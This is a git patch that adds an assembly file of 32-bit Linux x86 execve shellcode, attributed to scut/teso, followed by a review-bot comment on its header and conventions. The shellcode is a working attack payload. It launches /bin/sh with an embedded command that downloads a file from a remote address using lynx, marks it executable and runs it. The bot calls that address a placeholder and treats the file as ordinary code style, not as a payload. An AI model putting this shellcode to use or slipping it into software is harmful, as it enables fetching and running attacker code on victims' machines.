From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/tsig/shellcode/execve-shellcode.s | 49 +++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 other/tsig/shellcode/execve-shellcode.s

(limited to 'other/tsig/shellcode/execve-shellcode.s')

diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s
new file mode 100644
index 0000000..25015cf
--- /dev/null
+++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+
+.data
+.globl cbegin
+.globl cend
+
+cbegin:
+
+ jmp jahead
+
+docall:
+ pop %edi
+
+ xorl %eax, %eax /* read number of arguments */
+ push %eax
+ movb (%edi), %al
+ inc %edi
+
+decl1: push %edi
+decl2: scasb /* search delim bytes */
+ jnz decl2
+
+ movb %ah, -1(%edi)
+ dec %eax
+ jnz decl1
+
+ pop %ebx /* pathname */
+ push %ebx
+
+ push %eax
+ pop %edx /* esp -= 4, edx = &envp[] = NULL */
+ movl %esp, %ecx /* ecx = &argv[] */
+
+ movb $11, %al
+ int $0x80
+
+jahead: call docall
+
+/* reverse order arguments */
+.byte 0x03 /* number of arguments */
+.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte 0x03
+.ascii "-c"
+.byte 0x02
+.ascii "/bin/sh"
+.byte 0x01
+
+cend:
+
--
cgit v1.3
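Review bot: The header comment `/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */` is inconsistent with the file as committed, which appends a multi-line argument table after `jahead:` that is far longer than 38 bytes; presumably the count refers only to the code between `cbegin` and `jahead`, but the comment should say so or be dropped. The file also never states the conventions it depends on, so a reader cannot check it: a header line such as `/* AT&T syntax, 32-bit Linux int $0x80 ABI; cbegin/cend delimit the blob for an external harness */` would make the exported `cbegin`/`cend` symbols and the `.data` placement understandable, and the commit message `initial` gives no context for what consumes them. The address `123.123.123.123` inside the `.ascii` string reads like a placeholder left from an example and should be flagged as such in a comment rather than appear as a bare literal.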